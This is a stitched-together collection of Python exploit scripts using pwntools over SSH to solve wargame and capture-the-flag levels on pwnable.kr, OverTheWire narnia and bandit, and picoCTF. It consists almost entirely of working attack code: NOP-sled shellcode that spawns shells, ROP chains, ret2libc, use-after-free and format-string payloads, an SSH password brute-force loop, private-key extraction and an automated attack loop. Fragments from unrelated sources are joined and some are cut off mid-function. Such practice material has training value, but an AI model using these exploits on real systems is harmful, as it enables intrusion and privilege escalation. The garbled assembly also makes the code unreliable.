def try_login(host, port, user, password):
for passwd in password:
try:
con = ssh(user=user, host=host, port=port, password=passwd)
print(f'Password is ..., {passwd}')
con.interactive()
except:
pass
def sshClient(config, i):
sesh = pwn.ssh(config['Username'],
config['Address'],
password=pwReadOrWrite(0, i - 1),
port=config['Port'])
io = sesh.process('sh')
io.sendline(config['Commands'][0])
pwReadOrWrite(1, i + 1, stdout(io))
sesh.close()
def ssh_conn(user, pwd):
"""Open an SSH connection with Snowcrash VM
Use in 'with' statement, to automatically close connection when leaving
"""
display(f"Opening SSH connection with Snowcrash VM as {user}")
conn = ssh(host=vm, user=user, password=pwd, port=int(port), timeout=2)
display_welcome(user)
return conn
def main():
pwn.context(arch='amd64', os='linux')
mssh = pwn.ssh(host='pwnable.kr', user='******', password='******', port=2222)
attack = mssh.connect_remote('0.0.0.0', 9026)
shellcode = pwn.shellcraft.pushstr('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong')
shellcode += pwn.shellcraft.open('rsp', 0, 0)
shellcode += pwn.shellcraft.read('rax', 'rsp', 1024)
shellcode += pwn.shellcraft.write(1, 'rsp', 1024)
attack.recvuntil('give me your x64 shellcode: ')
attack.send(pwn.asm(shellcode))
print attack.recvall()
def get_process():
r = None
if args.REMOTE:
HOME_DIR = os.environ['HOME']
keyfile = os.path.join(HOME_DIR, '.ssh', 'id_rsa_picoctf')
ExploitInfo.pico_shell = ssh(host='2018game.picoctf.com',
user='******',
keyfile=keyfile)
r = ExploitInfo.pico_shell.process(ExploitInfo.name_on_shell)
else:
r = process('./%s' % ExploitInfo.name)
if args.GDB:
gdb.attach(r.pid, ExploitInfo.gdb)
return r
def exploit():
conn = pwn.ssh(user, host, port, pw)
pr = conn.process(target)
try:
elf = pwn.ELF(target, False)
payload = b'A' * 52
payload += pwn.p32(elf.sym["main"] + 155)
pr.sendlineafter("Enter your favorite color: ", payload)
pr.sendline("cat flag.txt")
print(pr.readall(2).decode())
except Exception as ex:
print(ex)
finally:
pr.close()
def main():
mssh = pwn.ssh(host='pwnable.kr',
user='******',
password='******',
port=2222)
attack = mssh.process('./unlink')
attack.recvuntil(": ")
addr_A = int(attack.recvline(), 16)
attack.recvuntil(": ")
A = int(attack.recvline(), 16)
print hex(A), hex(addr_A)
payload = pwn.p32(0x080484eb)
payload += 'A' * 12
payload += pwn.p32(A + 0x0c)
payload += pwn.p32(addr_A + 0x10)
attack.send(payload)
attack.interactive()
def __init__(self,
host,
port,
user,
password,
target,
cmd="",
byarg=False,
verbosity='info'):
Process.__init__(self, verbosity)
context.log_level = "error"
self._ssh = ssh(user, host, port, password)
self._target = target
if cmd != "":
self._cmd = cmd.split(" ")
else:
self._cmd = []
self._byarg = byarg
if self._byarg is False:
self._start_process()
def main():
username = input('username: '******'password: '******'Your username or password is incorrect',
file=sys.stderr,
flush=True)
exit(1)
import pwn # late import because pwntools messes up readline, needed by getpass
print(client.challenges())
for challenge in client.challenges():
if challenge['name'] == 'instance_1' and challenge[
'category'] == 'babysuid':
path = challenge['category'] + '/' + challenge['name']
pwn.log.info(f"Challenge: {challenge['id']} -- {path}")
client.work_on(challenge['id'], '/bin/cat')
# You must `ssh-add <path to private key` first
ssh = pwn.ssh('cse466', 'cse466.pwn.college', ssh_agent=True)
output = ssh('/bin/cat /flag').decode()
flag = re.search('pwn_college{(?P<flag>.*?)}', output)
if flag:
flag = flag['flag']
pwn.log.info("Flag: pwn_college{" + flag + "}")
correct_flag = client.submit_flag(challenge['id'], flag)
pwn.log.info(f"Correct: {correct_flag}")
def connexion():
global flag, host, user, port
return pwn.ssh(user, host, password=flag, port=port)
sh.sendline(b'mv data8.bin data.gz')
sh.sendline(b'gzip -d data.gz')
sh.sendline(b'cat data | cut -d" " -f4')
sh.recvuntil('data8.bin\n')
sh.recvuntil('$ $ ')
end()
# bandit13 --> bandit14
start()
sh.sendline(b'cat sshkey.private')
f2 = open('sshkey', 'wb')
sh.recvuntil(b"$ ")
f2.write(sh.recvuntil(b"-----END RSA PRIVATE KEY-----\n"))
f2.close()
s.close()
s = pwn.ssh('bandit14', host, keyfile='./sshkey', port=port)
sh = s.run('sh')
sh.sendline(b'cat /etc/bandit_pass/bandit14')
end()
os.system('rm sshkey')
# bandit14 --> bandit15
start()
sh.sendline(b'echo ' + flag + b' | nc localhost 30000')
sh.recvline()
end()
# bandit15 --> bandit16
start()
sh.sendline(b'openssl s_client -quiet -connect 127.0.0.1:30001')
sh.recvuntil(b'\nverify return:1\n')
import pwn
conn = pwn.ssh("lotto", "pwnable.kr", 2222, password="******")
line = conn.recvline(timeout=1)
print line
#! /usr/bin/env python3
import pwn
s = pwn.ssh('narnia6',
'narnia.labs.overthewire.org',
password='******',
port=2226)
ShellCode = pwn.asm(
pwn.shellcraft.i386.linux.setreuid(14007) + pwn.shellcraft.i386.linux.sh())
n = pwn.cyclic(300)
print(n)
s.interactive()
n = pwn.cyclic_find(0x63616173)
arg = (b'\x90' * n + ShellCode)[-n:] + pwn.p32(0xffffd420 + 2401)
p = s.process([b'/narnia/narnia4', arg])
p.sendline(b"cat /etc/narnia_pass/narnia5")
print(p.recvline())
s.close()
#!/usr/bin/env python3
import pwn
s = pwn.ssh('login', 'host', password='******', port=12345)
### ret2libc
payload = "A" * 32
payload += "\x10\x73\xe6\xb7"
payload += "\x60\xa2\xe5\xb7"
payload += "\x24\xff\xff\xbf"
print('payload: ' + payload)
p = s.process('r2c1 ' + payload, shell=True)
p.interactive()
#!/usr/bin/env python import pwn ssh = pwn.ssh(host='pwnable.kr', user='******', password='******', port=2222) attack = ssh.process(executable='./passcode') got_fflush = 0x0804a004 addr_before_sys = '134514147' payload = 96 * 'a' payload += pwn.p32(got_fflush) payload += addr_before_sys print attack.recv() attack.sendline(payload) flag = attack.recvall() print flag
#!/usr/bin/env python3
import pwn, re
from numpy import int32
ssh = pwn.ssh(host = 'pwnable.kr', user = '******', password = '******', port = 2222)
io = ssh.remote('localhost', 9032)
io.recvuntil(':')
payload = b'A' * 120 + pwn.p32(0x809fe4b) + pwn.p32(0x809fe6a) + pwn.p32(0x809fe89)\
+ pwn.p32(0x809fea8) + pwn.p32(0x809fec7) + pwn.p32(0x809fee6) + pwn.p32(0x809ff05) + pwn.p32(0x809fffc)
io.sendline('0')
io.recvuntil(': ')
io.sendline(payload)
io.recvuntil('Voldemort\n')
total = 0
pat = re.compile('You found ".*" \(EXP \+([-\d]*)\)')
for _ in range(7):
msg = io.recvline().decode()
num = int(pat.match(msg).group(1))
total += num
total = int32(total)
io.recvuntil(':')
io.sendline('0')
io.recvuntil(': ')
io.sendline(str(total))
print(io.recvline().decode())
#!/usr/bin/env python3
import pwn
import logging
#pwn.context.log_level = logging.ERROR
c = pwn.ssh("fd", "pwnable.kr", 2222, "guest")
#p = c.process("/bin/sh")
p = c.process(["./fd", str(0x1234)])
p.send("LETMEWIN\n")
print(p.recvall().decode("utf-8"))
REMOTE_BIN = "~/vuln" #For ssh
LIBC = "" #ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it
if LOCAL:
P = process(LOCAL_BIN) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN) # Extract data from binary
ROP_LOADED = ROP(ELF_LOADED) # Find ROP gadgets
elif REMOTETTCP:
P = remote('10.10.10.10', 1339) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN) # Extract data from binary
ROP_LOADED = ROP(ELF_LOADED) # Find ROP gadgets
elif REMOTESSH:
ssh_shell = ssh('bandit0',
'bandit.labs.overthewire.org',
password='******',
port=2220)
p = ssh_shell.process(REMOTE_BIN) # start the vuln binary
elf = ELF(LOCAL_BIN) # Extract data from binary
rop = ROP(elf) # Find ROP gadgets
if GDB and not REMOTETTCP and not REMOTESSH:
# attach gdb and continue
# You can set breakpoints, for example "break *main"
gdb.attach(P.pid, "b *main")
##########################
##### OFFSET FINDER ######
##########################
OFFSET = b"" #b"A"*264
break *0x00401082
# before "m->introduce();"
break *0x00400fe2
# before "new"
break *0x00401020
continue
'''
if pwn.args.GDB:
pwn.write('/tmp/payload', payload)
p = pwn.gdb.debug([exe.path, str(payload_length), '/tmp/payload'],
gdbscript=gdbscript)
elif pwn.args.LOCAL:
pwn.write('/tmp/payload', payload)
p = pwn.process([exe.path, str(payload_length), '/tmp/payload'])
else:
io = pwn.ssh("uaf", "pwnable.kr", 2222, "guest")
io.upload_data(payload, random_file)
p = io.process(["./uaf", str(payload_length), random_file])
p.recvuntil('1. use\n2. after\n3. free\n')
p.sendline('3')
for x in range(0, 2):
p.recvuntil('1. use\n2. after\n3. free\n')
p.sendline('2')
p.recvuntil('1. use\n2. after\n3. free\n')
p.sendline('1')
p.interactive()
#! /usr/bin/env python3
import pwn
s = pwn.ssh('narnia1',
'narnia.labs.overthewire.org',
password='******',
port=2226)
NopeSled = b'\x90' * 4096
ShellCode = pwn.asm(
pwn.shellcraft.i386.linux.setreuid(14002) + pwn.shellcraft.i386.linux.sh())
""" Finding Offset """
"""
for i in range(-300,5):
try:
p = s.process('/narnia/narnia1',
env={'EGG': pwn.p32(0xffffcb38+2048*i) + NopeSled + ShellCode })
print (p.recvline())
print (p.recvline())
print (p.recvline())
print (p.recvline())
print (p.recvline())
print (p.recvline())
except EOFError:
print (i)
"""
p = s.process(
'/narnia/narnia1',
env={'EGG': pwn.p32(0xffffcb38 - 2048 * 250) + NopeSled + ShellCode})
p.sendline('cat /etc/narnia_pass/narnia2')
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de955) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806f02a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08049303) # xor eax, eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0806cc25) # int 0x80
flag = ('A' * padding) + p
conn = ssh(host='2018shell2.picoctf.com',
user='******',
password='******')
program = conn.run(
' cd /problems/can-you-gets-me_4_f269dbca3097204b5d4a0064467b0a8c; ./gets')
print program.recv()
program.sendline(flag)
program.sendline('cat flag.txt')
print program.recvuntil('}')
def conn():
# basically just sshs into the level
return ssh(user=user, host=host, password=password, port=port)
#
# key = paramiko.RSAKey.from_private_key_file("ctf_key")
# conn = paramiko.SSHClient()
# conn.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# print ip
# print "connecting"
# conn.connect( hostname = ip,username="******",port =key_info['port'], pkey = key )
# stdin, stdout, stderr = conn.exec_command('ls -la')
# print stdout.readlines()
# conn.close()
# While loop to attack again and again after some time delay
ctf_key = paramiko.RSAKey.from_private_key_file("ctf_key")
shell = pwn.ssh(host=key_info['ip'],
user="******",
port=key_info['port'],
key=ctf_key,
timeout=30)
while (True):
fails = {}
services = t.get_service_list()
for service in services:
print json.dumps(service, indent=4, sort_keys=True)
targets = t.get_targets(service['service_id'])
# print json.dumps(targets, indent=4, sort_keys=True)
for target in targets["targets"]:
print json.dumps(target, indent=4, sort_keys=True)
if target['port'] == config["service_id_binary"]:
thread.start_new_thread(attack_binary,
(t, service, target, ctf_key))
time.sleep(0.5)
dst="2019shell1.picoctf.com"
user=""
pw=""
remote_binary = "/problems/overflow-0_4_e130f4df1710865981d50f778a8059f7/vuln"
#pwn.context.log_level = 'debug'
#pwn.context.binary = "./handy-shellcode/vuln"
#pwn.context.terminal = ["tmux","splitw","-v"]
RUN_ON_SERVER = False
conn = None
try:
if RUN_ON_SERVER:
proc = pwn.process(['./vuln','A'*256])
else:
conn = pwn.ssh(host=dst,user=user,password=pw)
proc = conn.process(remote_binary)
proc.sendline(pwn.asm(pwn.shellcraft.i386.linux.sh()))
proc.sendlineafter(b';', ("cat {}".format(flag_path)).encode())
proc.interactive()
except Exception as e:
print(e)
except KeyboardInterrupt:
pass
finally:
if not RUN_ON_SERVER and conn:
conn.close()
#!/usr/bin/env python3
import pwn
buff_size = 1024
host = pwn.ssh(host='pwnable.kr', port=2222, user='******', password='******')
proc = host.process(['./uaf', '24', '/dev/stdin'])
proc.recvuntil('free\n')
proc.sendline('3')
# get w memory chunk
proc.recvuntil('free\n')
proc.sendline('2')
proc.send('\x68\x15\x40\x00\x00\x00\x00')
proc.recvline() # your data is allocated
# get m memory chunk
proc.recvuntil('free\n')
proc.sendline('2')
proc.send('\x68\x15\x40\x00\x00\x00\x00')
proc.recvline() # your data is allocated
proc.recvuntil('free\n')
proc.sendline('1')
proc.interactive()
#! /usr/bin/env python3
import pwn
s = pwn.ssh('narnia0',
'narnia.labs.overthewire.org',
password='******',
port=2226)
p = s.process('/narnia/narnia0')
p.sendline(b"A" * pwn.cyclic_find(0x61616166) + pwn.p32(0xdeadbeef))
p.sendline(b"cat /etc/narnia_pass/narnia1")
p.recvuntil("val: 0xdeadbeef\n")
print(p.recvline())
p.close()
s.close()
#! /usr/bin/env python3
import pwn
s = pwn.ssh('narnia4',
'narnia.labs.overthewire.org',
password='******',
port=2226)
ShellCode = pwn.asm(
pwn.shellcraft.i386.linux.setreuid(14005) +
pwn.shellcraft.i386.linux.sh()
)
n=pwn.cyclic_find(0x63616173)
arg=(b'\x90'*n+ShellCode)[-n:]+pwn.p32(0xffffd420+2401)
p = s.process([b'/narnia/narnia4', arg])
p.sendline(b"cat /etc/narnia_pass/narnia5")
print(p.recvline())
s.close()
#! /usr/bin/env python3
import pwn
s = pwn.ssh('narnia5',
'narnia.labs.overthewire.org',
password='******',
port=2226)
n = 63
x = pwn.p32(0xffffdc2c)
arg = (x + b'%496c' + b'%5$n' + b'A' * n)[:n]
p = s.process([b'/narnia/narnia5', arg])
p.sendline(b"cat /etc/narnia_pass/narnia6")
p.recvline()
print(p.recvline())
s.close()
if f:
passwords = open('passwords.txt', 'a')
passwords.write(f'{i} {out}\n')
else:
passwords = open('passwords.txt', 'r')
return passwords.readlines()[i][2:-1]
def sshClient(config, i):
sesh = pwn.ssh(config['Username'],
config['Address'],
password=pwReadOrWrite(0, i - 1),
port=config['Port'])
io = sesh.process('sh')
io.sendline(config['Commands'][0])
pwReadOrWrite(1, i + 1, stdout(io))
sesh.close()
config = configLoad(1)
sesh = pwn.ssh(config['Username'],
config['Address'],
password='******',
port=config['Port'])
io = sesh.process('sh')
io.sendline(config['Commands'][0])
pwReadOrWrite(1, 1, stdout(io))
sesh.close()
for i in range(1, 6):
sshClient(configLoad(i + 1), i)
#! /usr/bin/env python3
import pwn
s = pwn.ssh('narnia2',
'narnia.labs.overthewire.org',
password='******',
port=2226)
ShellCode = pwn.asm(
pwn.shellcraft.i386.linux.setreuid(14003) + pwn.shellcraft.i386.linux.sh())
n = pwn.cyclic_find(0x6261616b)
arg = (b'\x90' * n + ShellCode)[-n:] + pwn.p32(0xffffddc0 + 20)
p = s.process([b'/narnia/narnia2', arg])
p.sendline(b"cat /etc/narnia_pass/narnia3")
print(p.recvline())
s.close()
